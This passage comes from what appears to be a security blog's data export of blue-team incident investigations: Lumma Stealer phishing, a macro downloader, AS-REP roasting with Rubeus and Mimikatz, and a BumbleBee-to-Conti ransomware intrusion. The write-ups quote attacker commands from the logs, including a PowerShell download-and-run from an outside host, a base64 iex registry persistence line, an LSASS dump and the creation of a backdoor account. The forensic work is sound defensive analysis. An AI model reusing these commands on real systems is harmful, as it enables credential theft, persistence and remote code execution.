before persistent C2 communication was confirmed.\nTriage Decision # True Positive. Click Fix phishing led to direct user execution of a PowerShell command, which launched mshta.exe to download and execute a confirmed malicious payload identified as Lumma Stealer. Escalated to L2 for memory acquisition and credential rotation.\nWhat is the impact level? # High. Lumma Stealer targets browser credentials, session cookies, cryptocurrency wallets, and stored passwords. Successful execution on Dylan\u0026rsquo;s host means any credentials stored in the browser or credential manager should be considered compromised pending L2 investigation.\nContainment # Is the attacker still active? # mshta.exe executed the payload and network connections to 35.190.80.1 were observed. Until L2 confirms whether Lumma Stealer established persistence or completed exfiltration, the attacker should be considered potentially active.\nIs the endpoint still exposed? # No. Host Dylan (172.16.17.216) was isolated via the Containment toggle in the endpoint management console.\nActions taken # Host Dylan (172.16.17.216) was contained. Domain windows-update[.]site and SMTP IP 132.232.40.201 were blocked at the email gateway and DNS level. Domain overcoatpassably[.]shop was blocked at the proxy. Case escalated to L2 for memory acquisition, browser credential rotation, and assessment of data exfiltration scope.\nIOCs # Type Value Description Email update@windows-update[.]site phishing sender IP 132.232.40.201 phishing SMTP and domain hosting IP 35.190.80.1 Google CDN - possible payload/C2 hosting Domain windows-update[.]site phishing domain, 11/95 VT URL hxxps://overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy.mp4 Lumma Stealer payload, 13/95 VT Host Dylan (172.16.17.216) compromised endpoint Account dylan@letsdefend.io targeted and compromised account Process mshta.exe PID 7284 LOLBin used to fetch and execute payload MITRE ATT\u0026amp;CK # Tactic Technique ID Initial Access Phishing: Spearphishing Link T1566.002 Execution User Execution: Malicious Link T1204.001 Execution Command and Scripting Interpreter: PowerShell T1059.001 Defense Evasion System Binary Proxy Execution: Mshta T1218.005 Defense Evasion Obfuscated Files or Information T1027 Credential Access Steal Web Session Cookie T1539 Collection Data from Local System T1005 Command and Control Ingress Tool Transfer T1105 ","date":"April 14, 2026","externalUrl":null,"permalink":"/blue_team/ld-lumma-stealer---dll-side-loading-via-click-fix-phishing/","section":"","summary":"A Click Fix phishing email impersonating Microsoft lured Dylan into visiting a malicious site, which executed a disguised PowerShell command launching mshta.exe to download Lumma Stealer payload from overcoatpassably.shop. The host was contained before confirmed data exfiltration.","title":"LD-Lumma Stealer - DLL Side-Loading via Click Fix Phishing","type":"blue_team"},{"content":" Alert # 1EventID : 231 2Event Time : Feb, 28, 2024, 08:42 AM 3Rule : SOC205 - Malicious Macro has been executed 4Level : Security Analyst 5Hostname : Jayne 6IP Address : 172.16.17.198 7File Name : edit1-invoice.docm 8File Path : C:\\Users\\LetsDefend\\Downloads\\edit1-invoice.docm 9File Hash : 1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0 10Trigger Reason : Suspicious file detected on system. 11AV/EDR Action : Detected Identification # What was the delivery vector? # Reviewing the Exchange mail server logs confirmed the delivery vector. At Feb 28, 2024, 08:12 AM - 30 minutes before the alert fired - the phishing email arrived from jake.admin@cybercommunity.info (source 172.67.156.165) to jayne@letsdefend.io, carrying the attachment edit1-invoice.docm.zip. The ZIP archive was used to bypass email gateway attachment filtering that would typically block .docm files directly.\nIs the payload malicious? # I submitted the file hash 1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0 to VirusTotal - 26/56 vendors flagged the file as malicious. Static analysis revealed the document contains a hidden macro that triggers automatically when an InkEdit element receives focus, extracting and executing a command from a TextBox control in a hidden window. This non-standard activation method is designed to bypass macro security warnings and analyst sandboxes that do not simulate user interaction. The threat category is identified as downloader.logan / powersh, confirming this is a macro-based downloader.\nWhat did the macro execute? # Process creation log Event ID 4688 showed that WINWORD.EXE (PID 4545) spawned powershell.exe under the LetsDefend account:\n1\u0026#39;C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE\u0026#39; /n 2\u0026#39;C:\\Users\\admin\\AppData\\Local\\Temp\\edit1-invoice.docm\u0026#39; PowerShell Script Block Logging Event ID 4104 captured the full command at 08:42 AM:\n1(New-Object System.Net.WebClient).DownloadFile( 2 \u0026#39;http://www.greyhathacker.net/tools/messbox.exe\u0026#39;, 3 \u0026#39;mess.exe\u0026#39; 4) 5Start-Process \u0026#39;mess.exe\u0026#39; The macro used System.Net.WebClient.DownloadFile to fetch messbox.exe from greyhathacker.net and immediately executed it as mess.exe in the current directory - a classic single-stage macro downloader execution pattern.\nDid anyone else get targeted? # The mail log shows the phishing email was addressed exclusively to jayne@letsdefend.io. No other recipients were identified in the delivery logs.\nDid the attack succeed? # Yes. The macro executed successfully, PowerShell spawned and ran the download command, and mess.exe was executed on the host. The EDR detected the activity but the payload reached execution stage before containment.\nTriage Decision # True Positive. A phishing email delivered a macro-enabled document that successfully executed a PowerShell downloader, fetched a second-stage executable from an external attacker domain, and ran it on the endpoint. Escalated to L2.\nWhat is the impact level? # High. The macro executed fully and mess.exe was launched on host Jayne (172.16.17.198). The second-stage payload origin greyhathacker.net is an attacker-controlled domain. Full scope of mess.exe activity requires memory forensics and process tree analysis by L2.\nContainment # Is the attacker still active? # The macro has executed and mess.exe was launched. Until L2 confirms whether mess.exe established persistence or C2 communication, the attacker should be considered potentially active on the endpoint.\nIs the endpoint still exposed? # No. Host Jayne was isolated via the Containment toggle in the endpoint management console, cutting it off from the corporate network.\nActions taken # Host Jayne (172.16.17.198) was contained. Sender domain cybercommunity.info and source IP 172.67.156.165 were blocked at the email gateway. Domain greyhathacker[.]net was blocked at the DNS/proxy level. Case escalated to L2 for memory acquisition and full forensic investigation of mess.exe behavior.\nIOCs # Type Value Description Email jake.admin@cybercommunity.info phishing sender IP 172.67.156.165 phishing email source Domain greyhathacker[.]net second-stage payload hosting URL hxxp://www.greyhathacker[.]net/tools/messbox.exe payload download URL File edit1-invoice.docm.zip phishing attachment File edit1-invoice.docm SHA256: 1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0 File mess.exe downloaded second-stage executable Host Jayne (172.16.17.198) compromised endpoint Account LetsDefend account under which macro executed ","date":"April 14, 2026","externalUrl":null,"permalink":"/blue_team/ld-malicious-macro-has-been-executed/","section":"","summary":"A phishing email from jake.admin@cybercommunity.info delivered a ZIP-archived Word macro document, which executed a PowerShell downloader fetching messbox.exe from greyhathacker.net. The host Jayne was contained after execution was confirmed.","title":"LD-Malicious Macro Executed","type":"blue_team"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/lolbins/","section":"Tags","summary":"","title":"LOLbins","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/lumma-stealer/","section":"Tags","summary":"","title":"Lumma Stealer","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/memory-analysis/","section":"Tags","summary":"","title":"Memory Analysis","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/mimikatz/","section":"Tags","summary":"","title":"Mimikatz","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/mshta/","section":"Tags","summary":"","title":"Mshta","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/phishing/","section":"Tags","summary":"","title":"Phishing","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/powershell/","section":"Tags","summary":"","title":"PowerShell","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/process-injection/","section":"Tags","summary":"","title":"Process Injection","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/rdp/","section":"Tags","summary":"","title":"RDP","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/rubeus/","section":"Tags","summary":"","title":"Rubeus","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/smb/","section":"Tags","summary":"","title":"SMB","type":"tags"},{"content":" TL;DR # User sanderson on Office-PC executed AdobeUpdater.exe from their Downloads folder - a binary that masquerades as an Adobe updater but is actually ApacheBench compiled as a dropper. It immediately established a C2 connection to 223.247.47.74:80, set a registry Run key for persistence, and dropped three tools into the Temp directory: Rubeus (renamed BackupUtility.exe), a PowerShell script, and Mimikatz (renamed DefragTool.exe). After injecting into cmd.exe and spawning PowerShell, the attacker queried the domain controller over LDAP and ran Rubeus to perform AS-REP Roasting against four accounts - sanderson, tcooper, FileShareService, and Administrator. With cracked tcooper credentials, the attacker authenticated to FileServer over the network, enabled RDP by modifying the registry, reconnected from 223.247.47.74 via RDP, navigated to C:\\Shares, and created CrashDump.zip to stage the data.\nInitial Access # I started with a broad query to catch anything suspicious in Downloads around process creation and file activity:\n1index=shadowroast event.code IN (1, 11, 15) AND *Downloads* | sort _time At 01:05:15, CORPNET\\sanderson ran AdobeUpdater.exe from their Downloads folder - parent was Explorer (PID 4340), medium integrity. Four seconds later they ran it again, this time getting PID 4928 at High integrity.\nThe metadata tells the real story - OriginalFileName: ab.exe, Description: ApacheBench command line utility, Company: Apache Software Foundation. Someone renamed ApacheBench to look like an Adobe updater.\nPersistence and C2 # Registry Run Key # Within two seconds of execution, PID 4928 wrote a Run key:\n1HKU\\...\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\wyW5PZyF The value is a one-liner that reads a base64 blob from a registry key (HKCU:Software\\EdI86bhr, value OQqd5sjJ) and executes it via iex in a hidden PowerShell window - fileless execution straight from the registry.\n1%%COMSPEC%% /b /c start /b /min powershell -nop -w hidden -c \u0026#34;sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item \u0026#39;HKCU:Software\\EdI86bhr\u0026#39;).GetValue(\u0026#39;OQqd5sjJ\u0026#39;))))\u0026#34; C2 Connection # At 01:05:17, two seconds after process creation, event id 3 showed PID 4928 connecting outbound to 223.247.47.74:80. The full timeline of AdobeUpdater.exe activity shows the three key events in tight sequence: creation at 01:05:15, network connection at 01:05:17, registry write at 01:05:58.\nFile Drops # Between 01:07:09 and 01:07:19, event id 11 showed PID 4928 dropping three files into C:\\Users\\Default\\AppData\\Local\\Temp\\:\n1BackupUtility.exe - 01:07:09 2SystemDiagnostics.ps1 - 01:07:14 3DefragTool.exe - 01:07:19 Process Injection # At 01:07:34, AdobeUpdater.exe spawned C:\\Windows\\SysWOW64\\cmd.exe (PID 2320), immediately followed by event id 10 - this event fires when one process opens a handle to another with specific access rights, and is the primary Sysmon indicator for process injection.\nThe event id 10 details show the injection clearly - source is AdobeUpdater.exe (PID 4928), target is cmd.exe (PID 2320), with GrantedAccess: 0x1fffff which is full access to the target process. The call trace runs through memory allocation and execution APIs in ntdll.dll, wow64.dll, and kernel32.dll - the standard call chain for DLL injection (T1055.001), where the attacker allocates memory in the target process, writes shellcode or a DLL path, and creates a remote thread to execute it.\nThe injected cmd.exe then spawned powershell.exe with -ep bypass.\nAt 01:07:52, event id 22 (DNS Query) showed a DNS lookup for DC01.CORPNET.local, which resolved to 10.0.0.147 - the attacker was locating the domain controller to prepare for Active Directory attacks.\nPrivilege Escalation - AS-REP Roasting # Rubeus Execution # After several LDAP connections to DC01 at 10.0.0.147:389, at 01:10:45 the attacker executed BackupUtility.exe, which is actually a Rubeus (MD5: 95BA181C0359495EFFEF4A990365752F). Rubeus is a command-line tool developed to misuse and manipulate Kerberos authentication in Windows Active Directory environments. Its main purpose is to launch different attacks based on Kerberos, including ticket-grabbing, ticket-manipulation, and pass-the-ticket attacks. Rubeus offers an interface for using Kerberos functionality to elevate privileges, impersonate users, and gain unauthorized access to resources within a compromised Active Directory environment.\n1\u0026#34;C:\\Users\\Default\\AppData\\Local\\Temp\\BackupUtility.exe\u0026#34; asreproast /format:hashcat AS-REP Roasting # The asreproast flag instructs Rubeus to perform AS-REP Roasting - an attack that targets Active Directory accounts with the \u0026ldquo;Do not require Kerberos pre-authentication\u0026rdquo; flag enabled. Normally, when a client requests a Kerberos Ticket Granting Ticket (TGT), the domain controller requires the client to first prove knowledge of the account\u0026rsquo;s password via an encrypted timestamp (pre-authentication). For accounts with pre-authentication disabled, the DC skips this check and returns the AS-REP response - part of which is encrypted with the account\u0026rsquo;s password hash. The attacker captures this response and cracks it offline with tools like hashcat to recover the plaintext password, without ever needing to interact with the account directly. example: A Splunk query for Kerberos TGT requests with pre-auth type 0 (meaning no pre-authentication was required) confirmed the attack succeeded against four accounts:\n1index=shadowroast event.code=4768 winlog.event_data.PreAuthType=0 The query returned 11 events between 01:03:38 and 01:19:20, with target usernames sanderson, tcooper, FileShareService, and Administrator - all returning status 0x0 (success), meaning the AS-REP hashes were successfully obtained for offline cracking.\nMimikatz Execution # At 01:14:46, DefragTool.exe was executed from the Temp directory. Its metadata unmasks it as Mimikatz (MD5: E930B05EFE23891D19BC354A4209BE3E). It was used to impersonate a Domain Controller and request password hashes via directory replication protocols (MS-DRSR), allowing them to dump domain credentials over the network without needing to touch LSASS on the DC itself.\nLateral Movement # FileServer Access # At 01:17:01, event id 4624 records showed tcooper authenticating to FileServer.CORPNET.local - Logon Type 3 (network authentication) originating from 10.0.0.184 multiple times between 01:17:01 and 01:17:50, indicating the attacker was using cracked tcooper credentials to access file shares over the network.\nRDP Enablement # At 01:17:14, the attacker ran a reg.exe command on FileServer to enable incoming RDP connections by setting fDenyTSConnections to 0 - by default this value is 1, which blocks Remote Desktop. Setting it to 0 opens the server to RDP from any address:\n1\u0026#34;C:\\Windows\\system32\\reg.exe\u0026#34; add \u0026#34;hklm\\system\\currentcontrolset\\control\\terminal server\u0026#34; /f /v fDenyTSConnections /t REG_DWORD /d 0 At 01:19:13 and 01:19:20, event id 4624 Logon Type 10 (Remote Interactive / RDP) confirmed the attacker reconnected from the external C2 IP 223.247.47.74 directly to FileServer via RDP using the tcooper account.\nCollection # At 01:20:44, via the RDP session, a PowerShell command navigated to the shares directory:\n1powershell.exe -noexit -command Set-Location -literalPath \u0026#39;C:\\Shares\u0026#39; At 01:21:04, event id 11 recorded the creation of C:\\Users\\Default\\AppData\\Local\\Temp\\CrashDump.zip - the attacker archived the contents of the Shares directory into a ZIP file named to blend in with legitimate crash dump artifacts and exfiltrated it.\nIOCs # Type Value Description IP 223.247.47.74 attacker C2 and RDP source IP 10.0.0.147 DC01.CORPNET.local - LDAP reconnaissance target File AdobeUpdater.exe MD5: 64944D0F73C599C39244B38A8A8BDC79 - masqueraded ApacheBench dropper File BackupUtility.exe MD5: 95BA181C0359495EFFEF4A990365752F - Rubeus File DefragTool.exe MD5: E930B05EFE23891D19BC354A4209BE3E - Mimikatz File SystemDiagnostics.ps1 dropped PowerShell script File C:\\Users\\Default\\AppData\\Local\\Temp\\CrashDump.zip staged share data for exfiltration Registry HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\wyW5PZyF fileless PowerShell persistence - T1547.001 Registry HKCU\\Software\\EdI86bhr value OQqd5sjJ encoded payload storage Registry HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections = 0 RDP enabled on FileServer Account CORPNET\\sanderson initial compromised account Account tcooper AD account cracked via AS-REP Roasting, used for lateral movement Account FileShareService AS-REP Roasted Account Administrator AS-REP Roasted Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef cred fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef lateral fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef exfil fill:#b71c1c,stroke:#7f0000,stroke-width:2px,color:#fff; A([CORPNET\\sandersonOffice-PC]):::default --\u003e B[01:05:15 - AdobeUpdater.exe executedmasquerading as Adobe updateractually ApacheBench dropper]:::access B --\u003e C[01:05:17 - C2 connection223.247.47.74:80]:::persist C --\u003e D[01:05:58 - Registry Run keyHKCU\\Run\\wyW5PZyFfileless PowerShell persistence]:::persist D --\u003e E[01:07:09-01:07:19 - Three files droppedBackupUtility.exe + SystemDiagnostics.ps1+ DefragTool.exe into Temp]:::exec subgraph Inject [Injection and Recon] E --\u003e F[01:07:34 - cmd.exe PID 2320 spawnedDLL injection T1055.001GrantedAccess 0x1fffff]:::inject F --\u003e G[01:07:34 - powershell -ep bypassspawned from injected cmd.exe]:::inject G --\u003e H[01:07:52 - DNS query DC01.CORPNET.localresolves to 10.0.0.147LDAP connections to port 389]:::inject end subgraph Cred [Credential Attacks] H --\u003e I[01:10:45 - BackupUtility.exe = Rubeusasreproast /format:hashcat4 accounts roasted - status 0x0]:::cred I --\u003e J[01:14:46 - DefragTool.exe = MimikatzLDAP query to DC01no lsass access]:::cred end subgraph Lateral [Lateral Movement] J --\u003e K[01:17:01 - tcooper Logon Type 3to FileServer from 10.0.0.184]:::lateral K --\u003e L[01:17:14 - fDenyTSConnections = 0RDP enabled on FileServer]:::lateral L --\u003e M[01:19:13 - tcooper RDP Logon Type 10from 223.247.47.74 to FileServer]:::lateral end subgraph Collect [Collection] M --\u003e N[01:20:44 - Set-Location C:\\Shares]:::exfil N --\u003e O[01:21:04 - CrashDump.zip createdshares data staged for exfiltration]:::exfil end ","date":"April 14, 2026","externalUrl":null,"permalink":"/blue_team/splunk-shadowroast/","section":"","summary":"A masqueraded AdobeUpdater.exe binary established persistence via a registry Run key, injected into cmd.exe, performed AS-REP Roasting with Rubeus against four AD accounts, laterally moved to FileServer using cracked tcooper credentials, enabled RDP, and staged share data for exfiltration.","title":"Splunk-ShadowRoast","type":"blue_team"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/sysmon/","section":"Tags","summary":"","title":"Sysmon","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/true-positive/","section":"Tags","summary":"","title":"True Positive","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/upx/","section":"Tags","summary":"","title":"UPX","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/vba/","section":"Tags","summary":"","title":"VBA","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/virustotal/","section":"Tags","summary":"","title":"VirusTotal","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/volatility3/","section":"Tags","summary":"","title":"Volatility3","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/windows/","section":"Tags","summary":"","title":"Windows","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/adfind/","section":"Tags","summary":"","title":"AdFind","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/anydesk/","section":"Tags","summary":"","title":"AnyDesk","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/bumblebee/","section":"Tags","summary":"","title":"BumbleBee","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/conti/","section":"Tags","summary":"","title":"Conti","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/elk/","section":"Tags","summary":"","title":"ELK","type":"tags"},{"content":" TL;DR # A phishing email delivered through the anonymous mail relay emkei.cz (114.29.236.247) reached CompliantSecure\u0026rsquo;s mail server MAIL01 at 2024-12-01 20:38:14. Twenty-three minutes later, user Administrator on IT01 downloaded NovaSecure_Audit_Findings.iso via Chrome webmail. After extracting the ISO with 7-Zip, the user executed Compliance_Reports.lnk, which launched BumbleBee loader 23.dll via rundll32.exe, establishing C2 to 3.68.97.124:443. The loader injected into ImagingDevices.exe at 21:09:27 (T1055), which beaconed a second C2 at 18.193.157.255:443. LSASS was dumped via procdump64.exe into C:\\ProgramData\\doc1.dmp. At 22:03, the attacker laterally moved to DC01 via PsExec using cracked markw credentials, dropped 1.7z containing AdFind and AnyDesk, created backdoor account sql_admin, performed network reconnaissance with a bat script, and RDP\u0026rsquo;d to FileServer01 (10.10.11.18). The attacker collected and archived share data, moved to Support01 using markw, downloaded Accounts_Updates_1524.csv, and finally executed patch.exe (Conti ransomware) across DC01 and FileServer01, dropping R3ADM3.txt ransom notes across all share directories.\nInitial Access # Phishing Email # To identify the initial access vector I started by examining mail server logs on MAIL01.\nAt 20:38:14, the log recorded Anonymous TLS connection established from emkei.cz[114.29.236.247] - emkei.cz is a anonymous email relay service frequently abused for phishing campaigns. I checked the domain on VirusTotal, where 12 out of 94 vendors flagged it as Malicious/Phishing.\nISO Delivery via Webmail # 23 minutes after the phishing email arrived, I found a Sysmon Event ID 15 on host IT01 at 21:02:00.\nUser Administrator downloaded NovaSecure_Audit_Findings.iso (SHA256: F445F806066028D621D8E6A6B949E59342C309DFEB1D517BD847F70069B1B8DD) through chrome.exe from the internal webmail. At 21:02:17, the user extracted the ISO using 7-Zip, which unpacked three files into C:\\Users\\Administrator\\Downloads\\NovaSecure_Audit_Findings: 23.dll, Compliance_Reports.lnk, and Critical_Findings_Summary.pdf.\nExecution # BumbleBee Loader # At 21:02:57 the Administrator double-clicked Compliance_Reports.lnk, which executed:\n1\u0026#34;C:\\Windows\\System32\\rundll32.exe\u0026#34; 23.dll, StartW This is the BumbleBee loader execution pattern - delivering a DLL inside an ISO and triggering it via an LNK file is the signature initial access technique associated with the GOLD CABIN threat group. The StartW export is BumbleBee\u0026rsquo;s standard entry point. Immediately at the same timestamp, Sysmon Event ID 3 confirmed rundll32.exe established an outbound TCP connection to 3.68.97.124:443.\nPost-Exploitation Discovery # Starting at 21:10:27, rundll32.exe spawned cmd.exe child processes for host and network enumeration.\nProcess Injection and C2 Persistence # Injection into ImagingDevices.exe # At 21:06:02, rundll32.exe (PID 4764) created C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe - a legitimate signed Windows binary selected to blend into normal process activity. At 21:09:27, Sysmon event id 8 confirmed code injection from rundll32.exe (PID 4764) into ImagingDevices.exe. The injected process subsequently established a second outbound HTTPS connection, from ImagingDevices.exe on IT01 to 18.193.157.255:443 - a second C2.\nCredential Dumping # At 21:15:03, cmd.exe executed:\n1procdump64.exe -accepteula -ma lsass.exe C:\\ProgramData\\doc1.dmp ProcDump is a legitimate Sysinternals diagnostic utility abused here to create a full memory dump of lsass.exe. The output file doc1.dmp was named to appear as a generic document. At 21:16:06, ImagingDevices.exe dropped C:\\ProgramData\\7zr.exe to the disk in preparation for compressing and staging the dump for exfiltration.\nLateral Movement # Initial Access to DC01 # With credentials obtained from the LSASS dump, the attacker authenticated to DC01 at 22:03.\nPsExec Deployment # At 22:03:41 on DC01, the file C:\\Windows\\0453497.exe was created, followed immediately at 22:04:02 by registry entries under HKLM\\System\\CurrentControlSet\\Services\\0453497\\ registering it as a Windows service, looks like PsExec lateral movement pattern where the tool copies a service binary to ADMIN$ and registers it remotely. At 22:04:03,rundll32.exe was launched as NT AUTHORITY\\SYSTEM with parent \\\\10.10.11.156\\ADMIN$\\0453497.exe, confirming PsExec execution originating from host 10.10.11.156.\nPost-Exploitation on DC01 # Tool Staging # At 22:06:58 and 22:07:10, C:\\ProgramData\\1.7z and C:\\ProgramData\\7zr.exe were created. The attcker extracted the archive, producing C:\\ProgramData\\AdFind.exe and C:\\ProgramData\\AnyDesk.exe. AdFind is a command-line Active Directory query tool used for domain reconnaissance. AnyDesk is a remote access application deployed here as a persistent backdoor channel independent of the compromised C2 implant.\nBackdoor Account Creation # At 22:07:44 the attacker created a new local user and immediately elevated it:\n1cmd.exe /C net user sql_admin P@ssw0rd! /add 2cmd.exe /C net localgroup Administrators sql_admin /ADD Network Reconnaissance # At 22:27:01, computers.txt and 1.bat were created on the sql_admin Desktop. At 22:27:11, 1.bat was executed, pinging four domain hosts by name: IT01.ad.compliantsecure.store, DC01.ad.compliantsecure.store, Support01.ad.compliantsecure.store, and FileServer01.ad.compliantsecure.store - confirming all four were reachable for further lateral movement.\nRDP to FileServer01 # At 22:30:17, C:\\Users\\sql_admin\\Documents\\Default.rdp was created, signaling RDP session preparation. At 22:30:26 - 22:31:32, Sysmon Event ID 3 confirmed mstsc.exe connecting from 10.10.11.156 to 10.10.11.18 on port 3389 under sql_admin.\nCollection and Exfiltration # At 22:36 and 22:51 on the file server, PowerShell accessed files across C:\\Users\\sql_admin\\Desktop\\Shares\\ and its subdirectories Documents, Finance, Taxes, and HR. The presence of R3ADM3.txt in every directory indicated ransomware note deployment had already begun during collection. The attacker archived the collected share data into Shares.7z and exfiltrated it.\nRansomware Deployment # At 22:41:21, patch.exe was created in C:\\Shares\\ on FileServer01. At 22:50:02, patch.exe was executed locally. And at 22:50:55, it was launched on DC01 via the network share path \\\\10.10.11.18\\Shares\\patch.exe.\nAt 22:50:57, mass creation of R3ADM3.txt across C:\\Users\\Public\\, C:\\Users\\Default\\AppData\\, and other directories confirmed patch.exe as Conti ransomware - the ransom note naming convention R3ADM3.txt is a known Conti indicator.\nIOCs # Type Value Description IP 114.29.236.247 phishing email source, emkei.cz relay IP 3.68.97.124 BumbleBee C2 server, port 443 IP 18.193.157.255 secondary C2 via injected ImagingDevices.exe, port 443 IP 10.10.11.110 IT01 - initial compromised host IP 10.10.11.156 PsExec lateral movement source IP 10.10.11.18 FileServer01 - ransomware deployment target Domain emkei.cz anonymous phishing mail relay, 12/94 VT Host IT01 initial compromise, Administrator and markw Host DC01 lateral movement target via PsExec Host FileServer01 ransomware deployment and data exfiltration Host Support01 lateral movement target via markw File C:\\Users\\Administrator\\Downloads\\NovaSecure_Audit_Findings.iso SHA256: F445F806066028D621D8E6A6B949E59342C309DFEB1D517BD847F70069B1B8DD - BumbleBee delivery ISO File 23.dll BumbleBee loader, executed via rundll32 StartW export File Compliance_Reports.lnk LNK trigger for BumbleBee execution File C:\\ProgramData\\doc1.dmp LSASS memory dump File C:\\ProgramData\\7zr.exe 7-Zip console archiver, dropped by ImagingDevices.exe File C:\\Windows\\0453497.exe PsExec service binary on DC01 File C:\\ProgramData\\AdFind.exe AD reconnaissance tool File C:\\ProgramData\\AnyDesk.exe persistent remote access backdoor File C:\\Shares\\patch.exe Conti ransomware payload File R3ADM3.txt Conti ransom note, dropped across all share directories Registry HKLM\\System\\CurrentControlSet\\Services\\0453497\\ PsExec service registration on DC01 Account Administrator initial compromised account on IT01 Account markw AD account used for DC01 and Support01 lateral movement Account sql_admin backdoor account created by attacker, password P@ssw0rd! Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef cred fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef lateral fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef ransom fill:#b71c1c,stroke:#7f0000,stroke-width:2px,color:#fff; A([emkei.cz - 114.29.236.247]):::default --\u003e B[20:38:14 - Phishing emaildelivered to MAIL01]:::access B --\u003e C[21:02:00 - Administrator downloadsNovaSecure_Audit_Findings.iso via ChromeIT01 - 10.10.11.110]:::access C --\u003e D[21:02:17 - 7-Zip extracts ISO23.dll + Compliance_Reports.lnk + PDF]:::exec D --\u003e E[21:02:57 - LNK executesrundll32.exe 23.dll StartWC2 to 3.68.97.124:443]:::exec subgraph Inject [Injection and Credential Dumping - IT01] E --\u003e F[21:06:02 - rundll32 spawnsImagingDevices.exe]:::inject F --\u003e G[21:09:27 - CreateRemoteThreadT1055 injection into ImagingDevices.exe]:::inject G --\u003e H[21:10:27 - Discoveryipconfig arp nbtstat]:::exec H --\u003e I[21:15:03 - procdump64 dumpslsass.exe to doc1.dmp]:::cred I --\u003e J[22:29:04 - ImagingDevices.exeC2 to 18.193.157.255:443]:::inject end subgraph DC [Lateral Movement to DC01] J --\u003e K[22:03 - markw elevated logonDC01 via NTLM v2 from IT01]:::lateral K --\u003e L[22:04 - PsExec from 10.10.11.1560453497.exe service - SYSTEM rundll32]:::lateral L --\u003e M[22:07 - AdFind + AnyDesk stagedsql_admin backdoor account created]:::lateral M --\u003e N[22:27 - 1.bat network reconpings IT01 DC01 Support01 FileServer01]:::exec end subgraph FS [Lateral Movement to FileServer01 and Support01] N --\u003e O[22:30 - RDP sql_admin10.10.11.156 to 10.10.11.18]:::lateral O --\u003e P[22:39:24 - markw logon to Support01Accounts_Updates_1524.csv collected]:::lateral P --\u003e Q[22:41 - patch.exe dropped to Sharestimestomped - FileServer01]:::exfil Q --\u003e R[22:36-22:51 - share files collectedShares.7z exfiltrated to attacker]:::exfil end subgraph Ransom [Ransomware Deployment] R --\u003e S[22:50:02 - patch.exe executedFileServer01 locally]:::ransom S --\u003e T[22:50:55 - patch.exe via UNC path\\\\10.10.11.18\\Shares\\patch.exe]:::ransom T --\u003e U[22:50:57 - R3ADM3.txt droppedConti ransomware across all directories]:::ransom end ","date":"April 13, 2026","externalUrl":null,"permalink":"/blue_team/elk-bumblebee---gold-cabin/","section":"","summary":"An employee at CompliantSecure received a phishing email from emkei.cz, downloaded a malicious ISO containing BumbleBee loader 23.dll, which 